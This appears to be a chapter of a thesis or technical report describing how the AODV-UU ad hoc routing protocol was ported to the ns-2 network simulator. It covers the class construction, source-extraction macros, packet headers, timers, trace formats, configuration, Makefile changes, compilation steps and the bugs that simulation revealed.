As re-colorization is only needed in dark mode, that is, when dark.css is active, there are no corresponding rules in light.css. /* dark.css */ --image-filter: grayscale(50%); img:not([src*=".svg"]) { filter: var(--image-filter); } Customizing dark mode re-colorization intensities with JavaScript Not everyone is the same and people have different dark mode needs. By sticking to the re-colorization method described above, I can easily make the grayscale intensity a user preference that I can change via JavaScript, and by setting a value of 0%, I can also disable re-colorization completely. Note that document.documentElementprovides a reference to the root element of the document, that is, the same element I can reference with the :rootCSS pseudo-class. const filter = 'grayscale(70%)'; document.documentElement.style.setProperty('--image-filter', value); Invert vector graphics and icons For vector graphics — that in my case are used as icons that I reference via <img> elements—I use a different re-colorization method. While research has shown that people don't like inversion for photos, it does work very well for most icons. Again I use CSS variables to determine the inversion amount in the regular and in the :hover state. Note how again I only invert icons in dark.css but not in light.css, and how :hover gets a different inversion intensity in the two cases to make the icon appear slightly darker or slightly brighter, dependent on the mode the user has selected. /* dark.css */ --icon-filter: invert(100%); --icon-filter_hover: invert(40%); img[src*=".svg"] { filter: var(--icon-filter); } /* light.css */ --icon-filter_hover: invert(60%); /* style.css */ img[src*=".svg"]:hover { filter: var(--icon-filter_hover); } Use currentColor for inline SVGs For inline SVG images, instead of using inversion filters, you can leverage the currentColor CSS keyword that represents the value of an element's color property. This lets you use the color value on properties that do not receive it by default. Conveniently, if currentColor is used as the value of the SVG fill orstrokeattributes, it instead takes its value from the inherited value of the color property. Even better: this also works for <svg><use href="…"></svg>, so you can have separate resources and currentColor will still be applied in context. Please note that this only works for inline or <use href="…"> SVGs, but not SVGs that are referenced as the src of an image or somehow via CSS. You can see this applied in the demo below. <!-- Some inline SVG --> <svg xmlns="" stroke="currentColor" > […] </svg> Smooth transitions between modes Switching from dark mode to light mode or vice versa can be smoothed thanks to the fact that both color and background-color are animatable CSS properties. Creating the animation is as easy as declaring two transitions for the two properties. The example below illustrates the overall idea, you can experience it live in thedemo. body { --duration: 0.5s; --timing: ease; color: var(--color); background-color: var(--background-color); transition: color var(--duration) var(--timing), background-color var(--duration) var(--timing); } Art direction with dark mode While for loading performance reasons in general I recommend to exclusively work with prefers-color-scheme in the media attribute of <link> elements (rather than inline in stylesheets), there are situations where you actually may want to work with prefers-color-scheme directly inline in your HTML code. Art direction is such a situation. 
On the web, art direction deals with the overall visual appearance of a page and how it communicates visually, stimulates moods, contrasts features, and psychologically appeals to a target audience. With dark mode, it's up to the judgment of the designer to decide what the best image is for a particular mode and whether re-colorization of images alone is good enough. If used with the <picture> element, the <source> of the image to be shown can be made dependent on the media attribute. In the example below, I show the Western hemisphere for dark mode, and the Eastern hemisphere for light mode or when no preference is given, defaulting to the Eastern hemisphere in all other cases. This is of course purely for illustrative purposes. Toggle dark mode on your device to see the difference.

<picture>
  <source srcset="western.webp" media="(prefers-color-scheme: dark)">
  <source srcset="eastern.webp" media="(prefers-color-scheme: light), (prefers-color-scheme: no-preference)">
  <img src="eastern.webp">
</picture>

Dark mode, but add an opt-out

As mentioned in the why dark mode section above, dark mode is an aesthetic choice for most users. In consequence, some users may actually like to have their operating system UI in dark, but still prefer to see their webpages the way they are used to seeing them. A great pattern is to initially adhere to the signal the browser sends through prefers-color-scheme, but to then optionally allow users to override their system-level setting.

The <dark-mode-toggle> custom element

You can of course create the code for this yourself, but you can also just use a ready-made custom element (web component) that I have created right for this purpose. It's called <dark-mode-toggle> and it adds a toggle (dark mode: on/off) or a theme switcher (theme: light/dark) to your page that you can fully customize. The demo below shows the element in action (oh, and I have also 🤫 silently snuck it in all of the other examples above).

<dark-mode-toggle></dark-mode-toggle>

Try clicking or tapping the dark mode controls in the upper right corner in the demo below. If you check the checkbox in the third and the fourth control, see how your mode selection is remembered even when you reload the page. This allows your visitors to keep their operating system in dark mode, but enjoy your site in light mode or vice versa.

GoogleChromeLabs / dark-mode-toggle: a custom element that allows you to easily put a Dark Mode 🌒 toggle or switch on your site. Installation from npm: npm install --save dark-mode-toggle

Conclusions

Working with and supporting dark mode is fun and opens up new design avenues. For some of your visitors it can be the difference between not being able to handle your site and being a happy user. There are some pitfalls and careful testing is definitely required, but dark mode is a great opportunity for you to show that you care about all of your users.
The best practices mentioned in this post and helpers like the <dark-mode-toggle> custom element should make you confident in your ability to create an amazing dark mode experience. Let me know on Twitter what you create, whether this post was useful, and any suggestions for improving it. Thanks for reading! 🌒

Related links

Resources for the prefers-color-scheme media query:

Resources for the color-scheme meta tag and CSS property:
- Chrome Platform Status page
- Chromium bug
- CSS Color Adjustment Module Level 1 spec
- CSS WG GitHub Issue for the meta tag and the CSS property
- HTML WHATWG GitHub Issue for the meta tag

General dark mode links:
- Material Design — Dark Theme
- Dark Mode in Web Inspector
- Dark Mode Support in WebKit
- Apple Human Interface Guidelines — Dark Mode

Background research articles for this post:
- What Does Dark Mode's "supported-color-schemes" Actually Do? 🤔
- Let there be darkness! 🌚 Maybe…
- Re-Colorization for Dark Mode

Acknowledgements

The prefers-color-scheme media feature, the color-scheme CSS property, and the related meta tag are the implementation work of 👏 Rune Lillesveen. Rune is also a co-editor of the CSS Color Adjustment Module Level 1 spec. I would like to 🙏 thank Lukasz Zbylut, Rowan Merewood, Chirag Desai, and Rob Dodson for their thorough reviews of this article. The loading strategy is the brainchild of Jake Archibald. Emilio Cobos Álvarez has pointed me to the correct prefers-color-scheme detection method. The tip with referenced SVGs and currentColor came from Timothy Hatcher. Finally, I am thankful to the many anonymous participants of the various user studies that have helped shape the recommendations in this article. Hero image by Nathan Anderson.
https://practicaldev-herokuapp-com.global.ssl.fastly.net/chromiumdev/hello-darkness-my-old-friend-3jcg
CC-MAIN-2021-25
refinedweb
3,780
52.49
Sudoku From HaskellWiki Revision as of 08:36, 11 April 2012 Here are a few Sudoku solvers coded up in Haskell... 1 Monadic non-deterministic solver Here is a solver by CaleGibbard. $ (n `notElem`) $ rs ++ cs ++ bs a <- get put (a // [((i,j),n)])., isDigit, digitToInt, intToDigit) (isDigit c) (digitToInt c) elemToChar :: Maybe Element -> Char elemToChar = maybe ' ' intToDig. Other trivia: It uses "mdo" and lazyness to initialize some of the doubly linked lists. 6 Very smart, with only a little guessing by ChrisKuklewicz. 7 Only guessing without dancing links by AndrewBromage This solver uses a different implementation of Knuth's algorithm, without using pointers. It instead relies on the fact that in Haskell, tree-like data structure (in this case, a Priority Search Queue) "undo" operations are essentially free. 8 9 Simple small solver I haven't looked at the other solvers in detail yet, so I'm not sure what is good or bad about mine, but here it is: -Brian Alliet <brian@brianweb.net> _ _ _ _ = [] 11 In-flight entertainment By Lennart Augustsson. 12 Sudoku incrementally, à la Bird -.) A full talk-through of the evolution of the code may be found under the course page. --Liyang 13:35, 27 July 2006 (UTC). 13) 14 A parallel solver A parallel version of Richard Bird's function pearl solver by Wouter Swierstra: 15 Another simple solver One day I wrote a completely naive sudoku solver which tried all possibilities to try arrays in Haskell. It works, however I doubt that I'll see it actually solve a puzzle during my remaining lifetime. So I set out to improve it. The new version still tries all possibilities, but it starts with the cell that has a minimal number of possibilities. import Array import List import System -- ([Possible Entries], #Possible Entries) type Field = Array (Int,Int) ([Int], Int) -- Fields are Strings of Numbers with 0 in empty cells readField ::String -> Field readField f = listArray ((1,1),(9,9)) (map (\j -> let n=read [j]::Int in if n==0 then ([0..9],9) else ([n],0)) f) -- x y wrong way -> reading wrong? no effect on solution though showField :: Field -> String showField f = unlines [concat [show $ entry (f!(y,x))|x<-[1..9]]|y<-[1..9]] printField :: Maybe Field -> String printField (Just f) = concat [concat [show $ entry f!(y,x))|x<-[1..9]]|y<-[1..9]] printField Nothing = "No solution" -- true if cell is empty isEmpty :: ([Int],Int) -> Bool isEmpty (xs,_) = xs == [0] entry :: ([Int],Int) -> Int entry = head.fst -- 0 possibilties left, no emtpy fields done :: Field -> Bool done a = let l=elems a in 0==foldr (\(_,x) y -> x+y) 0 l && all (not.isEmpty) l --return column/row/square containing coords (x,y), excluding (x,y) column::Field ->(Int,Int) -> [Int] column a ~(x,y)= [entry $ a!(i,y)|i<-[1..9],i/=x] row :: Field -> (Int,Int) -> [Int] row a ~(x,y)= [entry $ a!(x,j)|j<-[1..9],j/=y] square :: Field -> (Int, Int)-> [Int] square a ~(x,y) = block where n = head $ dropWhile (<x-3) [0,3,6] m = head $ dropWhile (<y-3) [0,3,6] block = [entry $ a!(i+n,j+m)|i<-[1..3],j<-[1..3],x/=i+n || y/=j+m] -- remove invalid possibilities remPoss :: Field -> Field remPoss f =array ((1,1),(9,9)) $ map remPoss' (assocs f) where others xy= filter (/=0) $ row f xy ++ column f xy ++ square f xy remPoss' ~(i,(xs,n)) | n/=0 = let nxs= filter ( `notElem` others i ) xs in (i,(nxs,length $ filter (/=0) nxs)) | otherwise = (i,(xs,n)) -- remove invalid fields, i.e. 
contains empty cell without filling possibilities remInv :: [Field] -> [Field] remInv = filter (all (\(_,(x,_)) -> x/=[0]).assocs) genMoves :: (Int,Int) -> Field -> [Field] genMoves xy f = remInv $ map remPoss [f // [(xy,([poss!!i],0))]|i<-[0..num-1]] where poss = tail $ fst (f!xy) num = snd (f!xy) --always try the entry with least possibilties first moves :: Field -> [Field] moves f = genMoves bestOne f where -- remove all with 0 possibilities, select the one with minimum possibilities bestOne =fst $ minimumBy (\(_,(_,n)) (_,(_,m)) -> compare n m) list list = ((filter (\(_,(_,x)) -> x/=0).assocs) f) play :: [Field] -> Maybe Field play (f:a) | done f= Just f | otherwise = play (moves f++a) play [] = Nothing -- reads a file with puzzles, path as argument main :: IO () main = do path <- getArgs inp<-readFile (path!!0) let x=lines inp let erg=map (printField.play) (map ((\x->[x]).remPoss.readField) x) writeFile "./out.txt" (unlines erg). 16 Constraint Propagation (a la Norvig) By Manu This is an Haskell implementation of Peter Norvig's sudoku solver (). It should solve, in a flash, the 95 puzzles found here : Thanks to Daniel Fischer for helping and refactoring., s `elem` u ]) | s <- squares] allPossibilities :: Grid allPossibilities = array box [ (s,digits) | s <- squares ] -- Parsing a grid into an Array parsegrid :: String -> Maybe Grid parsegrid g = do regularGrid g foldM assign allPossibilities (zip squares g) where regularGrid :: String -> Maybe String regularGrid g = if all (`elem` "0.-123456789") g then Just g else Nothing -- Propagating Constraints assign :: Grid -> (Square, Digit) -> Maybe Grid assign g (s,d) = if d `elem` digits -- check that we are assigning a digit and not a '.' then do let ds = g ! s toDump = delete d ds foldM eliminate g (zip (repeat s) toDump) else return g eliminate :: Grid -> (Square, Digit) -> Maybe Grid eliminate g (s,d) = let cell = g ! s in if d `notElem` cell then return g -- already eliminated -- else d is deleted from s' values else do let newCell = delete d cell newV = g // [(s,newCell)] newV2 <- case newCell of -- contradiction : Nothing terminates the computation [] -> Nothing -- if there is only one value left in s, remove it from peers [d'] -> do let peersOfS = peers ! s foldM eliminate newV (zip peersOfS (repeat d')) -- else : return the new grid _ -> return newV -- Now check the places where d appears in the peers of s foldM (locate d) newV2 (units ! s) locate :: Digit -> Grid -> Unit -> Maybe Grid locate d g u = case filter ((d `elem`) . -- [("1537"),("4"),...] = ys : sublist n zs where (ys,zs) = splitAt n xs line = hyphens ++ "+" ++ hyphens ++ "+" ++ hyphens hyphens = replicate 9 '-' main :: IO () main = do grids <- fmap lines $ readFile "top95.txt" mapM_ printGrid $ mapMaybe solve grids 17 Concurrent STM Solver Liyang wrote some applicative functor porn utilising STM. It's pretty but slow. Suggestions for speeding it up would be very welcome. 
18 Chaining style Solver by jinjing It uses some snippets and the dot hack import Prelude hiding ((.)) import T.T import List import Data.Maybe import Data.Char import Data.Map(keys, elems) import qualified Data.Map as Map row i = i `div` 9 col i = i `mod` 9 row_list i positions = positions.select(on_i_row) where on_i_row pos = pos.row == i.row col_list i positions = positions.select(on_i_col) where on_i_col pos = pos.col == i.col grid_list i positions = positions.select(on_same_grid i) on_same_grid i j = on_same_row_grid i j && on_same_col_grid i j on_same_row_grid i j = ( i.row.mod.send_to(3) - j.row.mod.send_to(3) ) == i.row - j.row on_same_col_grid i j = ( i.col.mod.send_to(3) - j.col.mod.send_to(3) ) == i.col - j.col board = 0.upto 80 choices = 1.upto 9 related i positions = positions.row_list(i) ++ positions.col_list(i) ++ positions.grid_list(i) values moves positions = positions.mapMaybe (moves.let_receive Map.lookup) possible_moves i moves = let positions = moves.keys in choices \\ positions.related(i).values(moves) sudoku_move moves = let i = moves.next_pos in moves.possible_moves(i).map(Map.insert i).map_send_to(moves) next_pos moves = (board \\ moves.keys) .label_by(choice_size).sort.first.snd where choice_size i = moves.possible_moves(i).length solve solutions 0 = solutions solve solutions n = solve next_solutions (n-1) where next_solutions = solutions.map(sudoku_move).concat parse_input line = line.words.join("") .map(\c -> if '1' <= c && c <= '9' then c else '0') .map(digitToInt).zip([0..]).reject((==0).snd).Map.fromList pretty_output solution = solution.elems.map(show).in_group_of(9) .map(unwords).unlines sudoku line = solve [given] (81 - given.Map.size).first.pretty_output where given = parse_input line 19 Finite Domain Constraint Solver by David Overton This solver uses a finite domain constraint solver monad described here. The core functions are shown below. A full explanation is here. type Puzzle = [Int] sudoku :: Puzzle -> [Puzzle] sudoku puzzle = runFD $ do vars <- newVars 81 [1..9] zipWithM_ (\x n -> when (n > 0) (x `hasValue` n)) vars puzzle mapM_ allDifferent (rows vars) mapM_ allDifferent (columns vars) mapM_ allDifferent (boxes vars) labelling vars rows, columns, boxes :: [a] -> [[a]] rows = chunk 9 columns = transpose . rows boxes = concatMap (map concat . transpose) . chunk 3 . chunk 3 . chunk 3 chunk :: Int -> [a] -> [[a]] chunk _ [] = [] chunk n xs = ys : chunk n zs where (ys, zs) = splitAt n xs 20 Very fast Solver by Frank Kuehnel This solver implements constraint propagation with higher level logic and search. Solves the 49151 puzzles with 17 hints in less than 50 seconds! More detail and less optimized versions are here. 
module Main where import qualified Data.Vector.Unboxed as V import qualified Data.Vector as BV (generate,(!)) import Data.List (foldl',sort,group) import Data.Char (chr, ord) import Data.Word import Data.Bits import Control.Monad import Data.Maybe import System (getArgs) -- Types type Alphabet = Word8 type Hypothesis = Word32 -- Hypotheses space is a matrix of independed hypoteses type HypothesesSpace = V.Vector Hypothesis -- Set up spatial transformers / discriminators to reflect the spatial -- properties of a Sudoku puzzle ncells = 81 -- vector rearrangement functions rows :: HypothesesSpace -> HypothesesSpace rows = id columns :: HypothesesSpace -> HypothesesSpace columns vec = V.map (\cidx -> vec `V.unsafeIndex` cidx) cIndices where cIndices = V.fromList [r*9 + c | c <-[0..8], r<-[0..8]] subGrids :: HypothesesSpace -> HypothesesSpace subGrids vec= V.map (\idx -> vec `V.unsafeIndex` idx) sgIndices where sgIndices = V.fromList [i + bc + br | br <- [0,27,54], bc <- [0,3,6], i<-[0,1,2,9,10,11,18,19,20]] -- needs to be boxed, because vector elements are not primitives peersDiscriminators = BV.generate ncells discriminator where discriminator idx1 = V.zipWith3 (\r c s -> (r || c || s)) rDscr cDscr sDscr where rDscr = V.generate ncells (\idx2 -> idx1 `div` 9 == idx2 `div` 9) cDscr = V.generate ncells (\idx2 -> idx1 `mod` 9 == idx2 `mod` 9) sDscr = V.generate ncells (\idx2 -> subGridOfidx1 == subGrid idx2) where subGridOfidx1 = subGrid idx1 subGrid idx = (idx `div` 27, (idx `div` 3) `mod` 3) -- Let's implement the logic -- Level 0 logic (enforce consistency): -- We can't have multiple same solutions in a peer unit, -- eliminate solutions from other hypotheses enforceConsistency :: HypothesesSpace -> Maybe HypothesesSpace enforceConsistency hypS0 = do V.foldM solutionReduce hypS0 $ V.findIndices newSingle hypS0 solutionReduce :: HypothesesSpace -> Int -> Maybe HypothesesSpace solutionReduce hypS0 idx = let sol = hypS0 V.! idx peers = peersDiscriminators BV.! idx hypS1 = V.zipWith reduceInUnit peers hypS0 where reduceInUnit p h | p && (h == sol) = setSolution sol | p = h `minus` sol | otherwise = h in if V.any empty hypS1 then return hypS1 else if V.any newSingle hypS1 then enforceConsistency hypS1 -- constraint propagation else return hypS1 -- Level 1 logic is rather simple: -- We tally up all unknown values in a given unit, -- if a value occurs only once, then it must be the solution! localizeSingles :: HypothesesSpace -> Maybe HypothesesSpace localizeSingles unit = let known = maskChoices $ accumTally $ V.filter single unit in if dups known then Nothing else case (filterSingles $ accumTally $ V.filter (not . single) unit) `minus` known of 0 -> return unit sl -> return $ replaceWith unit sl where replaceWith :: V.Vector Hypothesis -> Hypothesis -> V.Vector Hypothesis replaceWith unit s = V.map (\u -> if 0 /= maskChoices (s .&. u) then s `Main.intersect` u else u) unit -- Level 2 logic is a bit more complicated: -- Say in a given unit, we find exactly two places with the hypothesis {1,9}. -- Then obviously, the value 1 and 9 can only occur in those two places. -- All other ocurrances of the value 1 and 9 can eliminated. 
localizePairs :: HypothesesSpace -> Maybe HypothesesSpace localizePairs unit = let pairs = V.toList $ V.filter pair unit in if nodups pairs then return unit else case map head $ filter lpair $ tally pairs of [] -> return unit pl@(p:ps) -> return $ foldl' eliminateFrom unit pl where -- "subtract" pair out of a hypothesis eliminateFrom :: V.Vector Hypothesis -> Hypothesis -> V.Vector Hypothesis eliminateFrom unit p = V.map (\u -> if u /= p then u `minus` p else u) unit -- Level 3 logic resembles the level 2 logic: -- If we find exactly three places with the hypothesis {1,7,8} in a given unit, then all other ... -- you'll get the gist! localizeTriples :: HypothesesSpace -> Maybe HypothesesSpace localizeTriples unit = let triples = V.toList $ V.filter triple unit in if nodups triples then return unit else case map head $ filter ltriple $ tally triples of [] -> return unit tl@(t:ts) -> return $ foldl' eliminateFrom unit tl where -- "subtract" triple out of a hypothesis eliminateFrom :: V.Vector Hypothesis -> Hypothesis -> V.Vector Hypothesis eliminateFrom unit t = V.map (\u -> if u /= t then u `minus` t else u) unit -- Even higher order logic is easy to implement, but becomes rather useless in the general case! -- Implement the whole nine yard: constraint propagation and search applySameDimensionLogic :: HypothesesSpace -> Maybe HypothesesSpace applySameDimensionLogic hyp0 = do res1 <- logicInDimensionBy rows chainedLogic hyp0 res2 <- logicInDimensionBy columns chainedLogic res1 logicInDimensionBy subGrids chainedLogic res2 where chainedLogic = localizeSingles >=> localizePairs >=> localizeTriples logicInDimensionBy :: (HypothesesSpace -> HypothesesSpace) -> (HypothesesSpace -> Maybe HypothesesSpace) -> HypothesesSpace -> Maybe HypothesesSpace logicInDimensionBy trafo logic hyp = liftM (trafo . V.concat) $ mapM (\ridx -> do logic $ V.unsafeSlice ridx 9 hyp') [r*9 | r<- [0..8]] where hyp' :: HypothesesSpace hyp' = trafo hyp prune :: HypothesesSpace -> Maybe HypothesesSpace prune hypS0 = do hypS1 <- applySameDimensionLogic =<< enforceConsistency hypS0 if V.any newSingle hypS1 then prune hypS1 -- effectively implemented constraint propagation else do hypS2 <- applySameDimensionLogic hypS1 if hypS1 /= hypS2 then prune hypS2 -- effectively implemented a fix point method else return hypS2 search :: HypothesesSpace -> Maybe HypothesesSpace search hypS0 | complete hypS0 = return hypS0 | otherwise = do msum [prune hypS1 >>= search | hypS1 <- expandFirst hypS0] -- guessing order makes a big difference!! expandFirst :: HypothesesSpace -> [HypothesesSpace] expandFirst hypS | suitable == [] = [] | otherwise = let (_, idx) = minimum suitable -- minimum is the preferred strategy! in map (\choice -> hypS V.// [(idx, choice)]) (split $ hypS V.! idx) where suitable = filter ((>1) . fst) $ V.toList $ V.imap (\idx e -> (numChoices e, idx)) hypS -- Some very useful tools: -- partition a list into sublists chop :: Int -> [a] -> [[a]] chop n [] = [] chop n xs = take n xs : chop n (drop n xs) -- when does a list have no duplicates nodups :: Eq a => [a] -> Bool nodups [] = True nodups (x:xs) = not (elem x xs) && nodups xs dups :: Hypothesis -> Bool dups t = (filterDups t) /= 0 tally :: Ord a => [a] -> [[a]] tally = group . 
sort empty :: Hypothesis -> Bool empty n = (maskChoices n) == 0 single :: Hypothesis -> Bool single n = (numChoices n) == 1 lsingle :: [a] -> Bool lsingle [n] = True lsingle _ = False pair :: Hypothesis -> Bool pair n = numChoices n == 2 lpair :: [a] -> Bool lpair (x:xs) = lsingle xs lpair _ = False triple :: Hypothesis -> Bool triple n = (numChoices n) == 3 ltriple :: [a] -> Bool ltriple (x:xs) = lpair xs ltriple _ = False complete :: HypothesesSpace -> Bool complete = V.all single -- The bit gymnastics (wish some were implemented in Data.Bits) -- bits 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 .. 27 28 29 30 31 represents -- h - h - h - h - h - h - h - h - h - .. s l l l l -- with -- h : 1 iff element is part of the hypothesis set -- l : 4 bits for the cached number of h bits set -- s : 1 iff a single solution for the cell is found -- experiment with different strategies split :: Hypothesis -> [Hypothesis] split 0 = [] split n = [n `minus` bit1, (bit 28) .|. bit1] where bit1 = (bit $ firstBit n) minus :: Hypothesis -> Hypothesis -> Hypothesis xs `minus` ys | maskChoices (xs .&. ys) == 0 = xs | otherwise = zs .|. ((countBits zs) `shiftL` 28) where zs = maskChoices $ xs .&. (complement ys) numChoices :: Hypothesis -> Word32 numChoices n = (n `shiftR` 28) newSingle :: Hypothesis -> Bool newSingle n = (n `shiftR` 27) == 2 isSolution :: Hypothesis -> Bool isSolution n = n `testBit` 27 setSolution :: Hypothesis -> Hypothesis setSolution n = n `setBit` 27 maskChoices :: Hypothesis -> Hypothesis maskChoices n = n .&. 0x07FFFFFF intersect :: Hypothesis -> Hypothesis -> Hypothesis intersect x y = z .|. ((countBits z) `shiftL` 28) where z = maskChoices $ x .&. y countBits :: Word32 -> Word32 -- would be wonderful if Data.Bits had such a function countBits 0 = 0 countBits n = (cBLH 16 0xFFFF . cBLH 8 0xFF00FF . cBLH 4 0x0F0F0F0F . cBLH 2 0x33333333 . cBLH 1 0x55555555) n cBLH :: Int -> Word32 -> Word32 -> Word32 cBLH s mask n = (n .&. mask) + (n `shiftR` s) .&. mask firstBit :: Hypothesis -> Int -- should also be in Data.Bits firstBit 0 = 0 -- stop recursion !! firstBit n | n .&. 1 > 0 = 0 | otherwise = (+) 1 $ firstBit $ n `shiftR` 1 accumTally :: V.Vector Hypothesis -> Hypothesis accumTally nl = V.foldl' accumTally2 0 nl accumTally2 :: Word32 -> Word32 -> Word32 accumTally2 t n = (+) t $ n .&. (((complement t) .&. 0x02AAAAAA) `shiftR` 1) filterSingles :: Hypothesis -> Hypothesis filterSingles t = t .&. (((complement t) .&. 0x02AAAAAA) `shiftR` 1) filterDups :: Hypothesis -> Hypothesis filterDups t = (t .&. 0x02AAAAAA) `shiftR` 1 defaultHypothesis :: Hypothesis defaultHypothesis = 0x90015555 -- all nine alphabet elements are set mapAlphabet :: V.Vector Hypothesis mapAlphabet = V.replicate 256 defaultHypothesis V.// validDigits where validDigits :: [(Int, Hypothesis)] validDigits = [(ord i, (bit 28) .|. (bit $ 2*(ord i - 49))) | i <- "123456789"] toChar :: Hypothesis -> [Char] toChar s | single s = [normalize s] | otherwise = "." where normalize s = chr $ (+) 49 $ (firstBit s) `shiftR` 1 toCharDebug :: Hypothesis -> [Char] toCharDebug s | isSolution s = ['!', normalize s] | single s = [normalize s] | otherwise = "{" ++ digits ++ "}" where normalize s = chr $ (+) 49 $ (firstBit s) `shiftR` 1 digits = zipWith test "123456789" $ iterate (\e -> e `shiftR` 2) s test c e | e.&.1 == 1 = c | otherwise = '.' -- Initial hypothesis space initialize :: String -> Maybe HypothesesSpace initialize g = if all (`elem` "0.-123456789") g then let hints = zip [0..] translated translated = map (\c -> mapAlphabet V.! 
ord c) $ take ncells g in Just $ (V.replicate ncells defaultHypothesis) V.// hints else Nothing -- Display (partial) solution printResultD :: HypothesesSpace -> IO () printResultD = putStrLn . toString where toString :: HypothesesSpace -> String toString hyp = unlines $ map translate . chop 9 $ V.toList hyp where translate = concatMap (\s -> toCharDebug s ++ " ") printResult :: HypothesesSpace -> IO () printResult = putStrLn . toString where toString :: HypothesesSpace -> String toString hyp = translate (V.toList hyp) where translate = concatMap (\s -> toChar s ++ "") -- The entire solution process! solve :: String -> Maybe HypothesesSpace solve str = do initialize str >>= prune >>= search main :: IO () main = do [f] <- getArgs sudoku <- fmap lines $ readFile f -- "test.txt" mapM_ printResult $ mapMaybe solve sudoku 21 List comprehensions by Ben Lynn. Translated from my brute force solver in" 22 Add your own If you have a Sudoku solver you're proud of, put it here. This ought to be a good way of helping people learn some fun, intermediate-advanced techniques in Haskell. 23 get over 47,000 distict minimal puzzles from csse.uwa.edu that have only 17 clues. Then you can run all of them through your program to locate the most evil ones, and use them on your associates."
https://wiki.haskell.org/index.php?title=Sudoku&diff=45218&oldid=6667
CC-MAIN-2016-36
refinedweb
3,085
57.47
Hi

This is part of the code.

Originally Posted by MrFujin

# Fish Game
# By antiloquax

import pygame, random
from pygame.locals import *

pygame.init()
clock = pygame.time.Clock()
screen = pygame.display.set_mode([600,400])
pygame.display.set_caption("Fish Game")
music = pygame.mixer.Sound("tune.wav")
music.play(-1)
toy = pygame.mixer.Sound("toy.wav")
burp = pygame.mixer.Sound("burp.wav")

Here is where I get an error:

IDLE_tmp_0czq8u python 3.3.3 (v3.3.3:c3896275c0f6
>>>
>>> Traceback (most recent call last):
  File "C:\Python33\Fish Game.py", line 13, in <module>
    music = pygame.mixer.Sound("tune.wav")
pygame.error: Unable to open file 'tune.wav'
>>>

Thanks for all your help, but like I said I'm new to this.

Originally Posted by Dietrich

How do you put the sound wav file in the working folder or give it a full path? When I downloaded it, it was put in its own folder and that folder is in Python's 3.3 folder along with my program. How does Python open the wav's folder? Thanks.

This code sample might help ...

Code:
import os
import pygame

def load_sound(sound_filename, directory):
    """
    load the sound file from the given directory
    return the sound object
    """
    fullname = os.path.join(directory, sound_filename)
    sound = pygame.mixer.Sound(fullname)
    return sound

pygame.init()
screen = pygame.display.set_mode([600, 400])
pygame.display.set_caption("Play a Wave File")

# pick a wave (.wav) sound file you have in the given directory
directory = "C:/Windows/Media"
chimes = load_sound("chimes.wav", directory)
chimes.play()

# event loop and exit conditions
# use escape key or display window x click
while True:
    for event in pygame.event.get():
        if (event.type == pygame.QUIT or
                event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE):
            pygame.quit()
            raise SystemExit

Real Programmers always confuse Christmas and Halloween because Oct31 == Dec25

Thanks Dietrich, I finally got it working. Like you said before, the wav file has to be in the working directory. I finally figured out how to do it. Thanks again.
Bob
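For completeness, here is a small sketch of the other fix discussed in the thread: pointing pygame at the folder the script itself lives in, instead of relying on the current working directory. The file name is just the one from the Fish Game example.

import os
import pygame

pygame.init()

# build an absolute path next to this script, so it works no matter
# which folder Python was started from
here = os.path.dirname(os.path.abspath(__file__))
music = pygame.mixer.Sound(os.path.join(here, "tune.wav"))
music.play(-1)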
http://forums.devshed.com/python-programming/955225-python-pygames-last-post.html
CC-MAIN-2015-06
refinedweb
356
63.66
NAME

Perl::Critic::Theme - Construct thematic sets of policies.

DESCRIPTION

This is a helper class for evaluating theme expressions into sets of Policy objects. There are no user-serviceable parts here.

INTERFACE SUPPORT

This is considered to be a non-public class. Its interface is subject to change without notice.

METHODS

new( -rule => $rule_expression )

Returns a reference to a new Perl::Critic::Theme object. -rule.

THEME RULES

Parentheses can be used to enforce precedence as well. Supported operators are:

Operator    Alternative    Example
----------------------------------------------------------------
&&          and            'pbp && core'
||          or             'pbp || (bugs && security)'
!           not            'pbp && ! (portability || complexity)'

See "CONFIGURATION" in Perl::Critic for more information about customizing the themes for each Policy.

SUBROUTINES

cook_rule( $rule )

Standardize a rule into almost executable Perl code. The "almost" comes from the fact that theme names are left as is.

CONSTANTS

$RULE_INVALID_CHARACTER_REGEX

A regular expression that will return the first character in the matched expression that is not valid in a rule.
http://web-stage.metacpan.org/pod/Perl::Critic::Theme
CC-MAIN-2020-34
refinedweb
152
50.73
23 July 2010 17:33 [Source: ICIS news] TORONTO (ICIS news)--German business confidence marked its largest monthly increase in July since the country's reunification in 1990, largely driven by improved export prospects, a research institute said on Friday. The Munich-based Ifo institute said its monthly business climate index rose to 106.2 points in July, up by 5.6 points from June. The index is based on a survey of 7,000 businesses across Germany. Ifo president Hans-Werner Sinn said the latest survey showed that producers were optimistic about export prospects. Also, industry capacity utilisation was increasing, he said. Manufacturers were especially upbeat, with many indicating they may boost staff levels, the survey found. The increase in the Ifo index contrasts with July's decline in another key indicator that measures economic sentiment based on a survey of analysts. The Mannheim-based ZEW centre for European economic research said earlier that its economic sentiment index marked its third monthly decline in a row in July amid continued worries over the euro zone debt crisis. However, Frankfurt-based chemical trade group VCI has said it expected production to grow at a slower pace in the second half of 2010, partly due to lower growth in the EU, which is the largest export market for the German chemical industry. Full-year 2010 chemical production growth is forecast at 8.5%, after a 10% decline in 2009 from 2008.
http://www.icis.com/Articles/2010/07/23/9379005/german-business-confidence-jumps-on-export-prospects-survey.html
CC-MAIN-2013-48
refinedweb
237
52.6
Problem: How to write the ternary operator in a lambda function?

Example: Say, you've got the following example:

def f(x):
    if x > 100:
        x = 1.1*x
    else:
        x = 1.05*x
    return x

print(f(100))
# 105.0

The function f(x) takes one argument x and increases it by 10% if the argument is larger than 100. Otherwise, it increases it by 5%. In this article, you'll learn how to convert this code snippet into a Python One-Liner by using the ternary operator - so stay tuned!

But first things first: we start with a short explanation of the ternary operator and the lambda function. If you already know these Python concepts very well, you can skip them and go right away to the solution.

Short Recap: Ternary Operator

Short Recap: Lambda Functions

Here's a practical example where lambda functions are used to generate an incrementor function (see the reconstruction sketched below): Exercise: Add another parameter to the lambda function! Watch the video or read the article to learn about lambda functions in Python. Now, you know everything you need to know to shorten the above code snippet!

Method: Using the Ternary Operator in a Lambda Function

As it turns out, you can also use the ternary operator effectively:

f = lambda x: 1.1*x if x > 100 else 1.05*x

print(f(100))
# 105.0

The result is the same. An intermediate to advanced Python coder will have no problem understanding the code, and it's much more concise. That's why I'd prefer this way over the first one. Here's a direct one-on-one comparison of both methods. Which one do you like most? Try it yourself!

Exercise: Before you run the code, take a guess: what's the output of this code puzzle?
